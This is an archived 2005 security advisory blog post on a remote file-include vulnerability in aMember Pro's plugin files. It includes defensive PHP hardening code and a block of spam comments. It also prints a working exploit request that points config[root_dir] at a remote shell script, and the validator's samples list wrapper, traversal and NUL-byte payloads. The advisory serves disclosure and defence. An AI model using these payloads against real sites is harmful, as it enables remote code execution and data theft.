by r0t,der4444,cembo,VietMafia

Monday, September 05, 2005

aMember Pro 2.3.X - Remote File Include Vulnerability

[NewAngels Advisory #2] aMember Pro 2.3.X - Remote File Include Vulnerability
=============================================================================


Software: aMember Pro 2.3.4
Type: Remote PHP File Include Vulnerability
Risk: High

Date: Aug. 16 2005
Vendor: CGI Central


Credit:
=======
NewAngels Team with special note of 4Degrees.


Description:
============
"aMember is a flexible membership and subscription management PHP script. It has support for PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling, Multicards, E-Gold and Clickbank payment systems (complete list can be found here) and allows you to setup paid-membership areas on your site. It can also be used without any payment system - you can manage users manually."
[http://www.amember.com/]


PHP Requirements:
=================
register_globals = On
(With register_globals enabled, a request variable named config[root_dir] is imported into the global scope as $config['root_dir'] before the script runs. Fetching the remote file additionally needs the URL fopen wrappers, which were enabled by default at the time.)


Vulnerability:
==============
Source:
>global $config;
>[...]
>require_once($config['root_dir']."...somestring...");

The plugin files take their include base directory from the global $config array instead of deriving it from their own location, and they can be requested directly. When such a file is called on its own, nothing sets $config['root_dir'] before the require_once(), so a value supplied in the request (see PHP Requirements) becomes the path prefix, and a URL there makes PHP fetch and execute remote code.




Exploitation:
=============
This vulnerability exists in several files; the code is not identical in every file, but the exploit is the same for all of them.

Example: http://www.somesite.com/aMember/plugins/db/mysql/mysql.inc.php
POST: config[root_dir]=http://www.geocities.com/angelteamfiles/shells/banner.php?
(The trailing "?" turns the "...somestring..." suffix that the script appends into a query string, so the remote file is fetched as-is.)
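The following is an added example, not code from the advisory or from aMember: it reproduces the include pattern the advisory quotes next to a hardened version that does not let a request choose the include base, and runs a path check over constructed sample values of the kind a request could place in config[root_dir]. The file name "/config.inc.php", the AMEMBER_LOADED constant and the sample inputs are assumptions made for illustration. Note that register_globals imports GET, POST and cookie variables alike, so the POST in the example above is only one of the ways the variable can arrive; the real fix is not to read the include base from globals at all (and, on the php.ini side, register_globals = Off and allow_url_fopen = Off, or allow_url_include = Off on PHP 5.2 and later).

```php
<?php
// Added example (not from the advisory or from aMember): the include pattern the
// advisory quotes, next to a hardened version. "/config.inc.php", the
// AMEMBER_LOADED constant and the sample inputs are assumptions for illustration.

// --- Vulnerable shape ---------------------------------------------------------
// With register_globals=On, PHP imports request variables into the global scope
// before the script runs, so config[root_dir]=http://evil.example/shell.php?
// arrives with $config['root_dir'] already set. require_once() then fetches and
// executes the remote file (URL fopen wrappers were on by default at the time).
function vulnerable_include()
{
    global $config;                          // may already be attacker-controlled
    require_once($config['root_dir'] . "/config.inc.php");  // assumed file name
}

// --- Hardened shape -----------------------------------------------------------
// Accept only an existing local directory that is the install root or lies
// inside it; reject URL schemes, stream wrappers, NUL bytes and "../" escapes.
function is_local_root_dir($candidate, $install_root)
{
    if (!is_string($candidate) || $candidate === '' || strpos($candidate, "\0") !== false) {
        return false;                        // NUL bytes truncate paths in C-level calls
    }
    // scheme://..., data:, php: (realpath() rejects wrappers too; this is defence in depth)
    if (preg_match('#^(?:[a-z][a-z0-9+.\-]*://|data:|php:)#i', $candidate)) {
        return false;
    }
    $root = realpath($install_root);
    $real = realpath($candidate);            // false for URLs and non-existent paths
    if ($root === false || $real === false || !is_dir($real)) {
        return false;
    }
    return $real === $root || strpos($real, $root . DIRECTORY_SEPARATOR) === 0;
}

function safe_include($relative)
{
    // 1. Plugin files must never be entry points: the application's front
    //    controller is assumed to define AMEMBER_LOADED before including them.
    if (!defined('AMEMBER_LOADED')) {
        header('HTTP/1.0 403 Forbidden');
        exit('direct access denied');
    }
    // 2. Derive the base from this file's own location, never from $config or
    //    any request variable, and keep the resolved target inside it.
    $root   = realpath(dirname(__FILE__));
    $target = realpath($root . '/' . $relative);
    if ($target === false || strpos($target, $root . DIRECTORY_SEPARATOR) !== 0) {
        exit('include outside install dir refused');
    }
    require_once $target;
}

// Demonstration on constructed inputs (values a request could put in config[root_dir]).
$install_root = dirname(__FILE__);
$samples = array(
    $install_root,                                                 // legitimate: ACCEPT
    'http://www.geocities.com/angelteamfiles/shells/banner.php?',  // advisory's payload style
    'php://input',                                                 // stream wrapper
    'data:text/plain;base64,PD9waHAgcGhwaW5mbygpOw==',             // data: wrapper
    $install_root . '/../../etc',                                  // traversal out of the root
    "$install_root\0.php",                                         // NUL truncation trick
);
foreach ($samples as $s) {
    printf("%-65s => %s\n", str_replace("\0", '\0', $s),
           is_local_root_dir($s, $install_root) ? 'ACCEPT' : 'REJECT');
}
```

Only the first sample is accepted; every URL, wrapper, traversal and NUL variant is refused before any include runs. The entry-point check in safe_include() is what closes the direct-request vector the advisory relies on, independent of the php.ini settings.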

Vulnerable Files:
/aMember/plugins/db/mysql/mysql.inc.php
/aMember/plugins/payment/efsnet/efsnet.inc.php
/aMember/plugins/payment/theinternetcommerce/theinternetcommerce.inc.php
/aMember/plugins/payment/cdg/cdg.inc.php
/aMember/plugins/payment/compuworld/compuworld.inc.php
/aMember/plugins/payment/directone/directone.inc.php
/aMember/plugins/payment/authorize_aim/authorize_aim.inc.php
/aMember/plugins/payment/beanstream/beanstream.inc.php
/aMember/plugins/payment/echo/config.inc.php
/aMember/plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php
/aMember/plugins/payment/eway/eway.inc.php
/aMember/plugins/payment/linkpoint/linkpoint.inc.php
/aMember/plugins/payment/logiccommerce/logiccommerce.inc.php
/aMember/plugins/payment/netbilling/netbilling.inc.php
/aMember/plugins/payment/payflow_pro/payflow_pro.inc.php
/aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php
/aMember/plugins/payment/payos/payos.inc.php
/aMember/plugins/payment/payready/payready.inc.php
/aMember/plugins/payment/plugnplay/plugnplay.inc.php

Original advisory:
http://pridels.blogspot.com/2005/09/amember-pro-23x-remote-file-include.html

10 Comments:

Anonymous Anonymous told...

Go 2 Clickbank **Clickbank, Clickbank Directory** offers you the latest news on Clickbank

2:47 AM

 
Blogger Editor Choice told...

Interesting blog. Well done!
The following site is interesting:
Go 2 clickbank clickbank Directory, Clickbank secure market place offers you the best choice of products available on the internet. Just check it.

7:11 AM

 
Anonymous E-gold told...

Hey Blogger this is a good post about aMember Pro 2.3.X - Remote File Include Vulnerability you started here. My site is related to Learn Ecurrency Exchange. Come by and see it if you're interested in that sort of thing.

2:51 AM

 
Anonymous how to make money told...

Hi Blogger, well you know we humans always start doing things on one topic and later find ourselves doing something else; this is always what happens to me. I started looking for something on e-gold 2 hours ago, however I have found myself looking at all different topics, of course including your site aMember Pro 2.3.X - Remote File Include Vulnerability. I thought what the hell, since I'm here already I might as well just leave a few words. Ok, I'll go on to search for e-gold related stuff again and hopefully it'll take me longer than last time to lose my concentration. Cheers!

12:41 PM

 
Anonymous how to make money told...

Hi Blogger, the content on your blog is quite interesting to me, although it is not quite what I was looking for. I was out searching for stuff on webmasterworld but I have gone through so many different sites that are not related to the topic I was looking for, and I did not feel like posting on any of them until now. I thought it's nice to leave something, although aMember Pro 2.3.X - Remote File Include Vulnerability is not exactly webmasterworld related, because I still kind of enjoyed it. Thanks!

9:46 PM

 
Anonymous Army told...

Excellent site, enjoyed my visit! I will be back soon!

2:57 PM

 
Anonymous currency trading told...

Hey!, Just browsing around for ideas for my new. (While we're at the same topic), I'm just getting started if you want to visit:
currency trading

Charles

2:03 AM

 
Anonymous e currency exchange told...

Hey how are you doing? just letting you know that someone from Central America read your blog!

Regards,
Charles
e currency exchange

6:29 AM

 
Anonymous dxgold told...

Hi, Just browsing around for ideas for my site. (While we're at the same topic), I'm just getting started if you want to visit:
dxgold

Charles

5:21 PM

 
Anonymous Anonymous told...

lol look at all the blog crawler posts, all the "hey blogger,..." and "hi blogger,...", and then they say something stupid because it just takes the title of the page and puts it in there. I found this interesting but rather pointless to an extent, because almost all major companies that still use aMember Pro have this fixed, and everyone who doesn't doesn't really have anything worth looking at anyway.

2:54 PM

 


 
Copyright (c) 2006 Pridels Sec Crew